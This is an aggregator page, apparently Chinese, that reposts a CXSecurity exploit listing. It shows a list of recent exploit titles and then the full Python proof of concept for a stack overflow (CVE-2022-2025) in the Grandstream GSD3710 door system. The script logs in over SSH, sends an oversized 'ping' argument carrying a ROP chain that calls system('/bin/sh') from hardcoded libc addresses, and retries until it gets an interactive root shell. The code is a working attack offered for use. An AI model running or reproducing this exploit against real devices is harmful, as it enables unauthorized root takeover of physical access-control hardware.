惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

SecWiki News
SecWiki News
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
V
Visual Studio Blog
博客园 - 叶小钗
S
SegmentFault 最新的问题
IT之家
IT之家
大猫的无限游戏
大猫的无限游戏
博客园_首页
Apple Machine Learning Research
Apple Machine Learning Research
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
月光博客
月光博客
酷 壳 – CoolShell
酷 壳 – CoolShell
腾讯CDC
D
Darknet – Hacking Tools, Hacker News & Cyber Security
V
V2EX
阮一峰的网络日志
阮一峰的网络日志
L
Lohrmann on Cybersecurity
量子位
C
Cyber Attacks, Cyber Crime and Cyber Security
T
Tor Project blog
J
Java Code Geeks
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
博客园 - 三生石上(FineUI控件)
Attack and Defense Labs
Attack and Defense Labs
AI
AI
The Cloudflare Blog
T
Tailwind CSS Blog
S
Schneier on Security
爱范儿
爱范儿
PCI Perspectives
PCI Perspectives
Stack Overflow Blog
Stack Overflow Blog
S
Secure Thoughts
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
T
The Exploit Database - CXSecurity.com
博客园 - 【当耐特】
V2EX - 技术
V2EX - 技术
S
Securelist
P
Proofpoint News Feed
T
Threat Research - Cisco Blogs
Help Net Security
Help Net Security
C
Cisco Blogs
N
News and Events Feed by Topic
人人都是产品经理
人人都是产品经理
B
Blog RSS Feed
K
Kaspersky official blog
T
The Blog of Author Tim Ferriss
G
Google Developers Blog
S
Security Affairs
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
Simon Willison's Weblog
Simon Willison's Weblog

The Exploit Database - CXSecurity.com

XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE) Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials Commvault CLI Argument Injection / Traversal / Remote Code Execution Sitecore XP Post-Authentication File Upload Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation Ghost CMS 5.59.1 Arbitrary File Read DOS Baby POP3 Server 1.04 Tenda AC20 16.03.08.12 Command Injection Projectworlds Online Admission System 1.0 SQL Injection JetBrains TeamCity 2023.11.4 Authentication Bypass Cisco ISE 3.0 Remote Code Execution Pandora ITSM Authenticated Command Injection Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE Malicious XDG Desktop File - CXSecurity.com Langflow 1.2.x Remote Code Execution (RCE) Microsoft Excel LTSC 2024 Remote Code Execution Adobe ColdFusion 2023.6 Remote File Read Malicious Windows Registration Entries (.reg) File Microsoft PowerPoint 2019 Remote Code Execution (RCE) Discourse 3.2.x Anonymous Cache Poisoning VBA Bypass Windows Defender Exploit PoC Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE) PHP CGI Module 8.3.4 Remote Code Execution Parrot and DJI variants Drone OSes Kernel Panic Exploit
Grandstream GSD3710 1.0.11.13 Stack Overflow
2025-06-29 · via The Exploit Database - CXSecurity.com

#!/usr/bin/env python3 # Exploit Title: Grandstream GSD3710 1.0.11.13 - Stack Overflow # Date: 2025-05-29 # Exploit Author: Pepelux # Vendor Homepage: https://www.grandstream.com/ # Version: Grandstream GSD3710 - firmware:1.0.11.13 and lower # Tested on: Linux and MacOS # CVE: CVE-2022-2025 """ Author: Jose Luis Verdeguer (@pepeluxx) Required: Pwntools Example: $ python 3 CVE-2022-2025.py -i DEVICE_IP -u USER -p PASSWORD """ from struct import pack import sys from time import sleep import argparse from pwn import * def get_args(): parser = argparse.ArgumentParser( formatter_class=lambda prog: argparse.RawDescriptionHelpFormatter( prog, max_help_position=50)) # Add arguments parser.add_argument('-i', '--ip', type=str, required=True, help='device IP address', dest="ip") parser.add_argument('-u', '--user', type=str, required=True, help='username', dest="user") parser.add_argument('-p', '--pass', type=str, required=True, help='password', dest="pwd") # Array for all arguments passed to script args = parser.parse_args() try: ip = args.ip user = args.user pwd = args.pwd return ip, user, pwd except ValueError: exit() def check_badchars(payload): for i in range(5, len(payload)): if payload[i] in [0xd, 0xa, 0x3b, 0x7c, 0x20]: log.warn("Badchar %s detected at %#x" % (hex(payload[i]), i)) return True return False def main(): ip, user, pwd = get_args() libc_base = 0x76bb8000 gadget = libc_base + 0x5952C # 0x0005952c: pop {r0, r4, pc}; bin_sh = libc_base + 0xCEA9C # /bin/sh system = libc_base + 0x2C7FD # 0x0002c7fd # system@libc exit = libc_base + 0x2660C print("[*] Libc base: %#x" % libc_base) print("[*] ROP gadget: %#x" % gadget) print("[*] /bin/sh: %#x" % bin_sh) print("[*] system: %#x" % system) print("[*] exit: %#x\n" % exit) padding = b"A" * 320 payload = b'ping ' payload += padding payload += p32(gadget) payload += p32(bin_sh) payload += b"AAAA" payload += p32(system) payload += p32(exit) if check_badchars(payload): sys.exit(0) count = 1 while True: print('Try: %d' % count) s = ssh(user, ip, 22, pwd) p = s.shell(tty=False) print(p.readuntil(b"GDS3710> ")) p.sendline(payload) p.sendline(b"id") sleep(1) data = p.read() if str(data).find('root') > -1: print('PWNED!') p.interactive() s.close() sys.exit() s.close() count += 1 if __name__ == '__main__': main()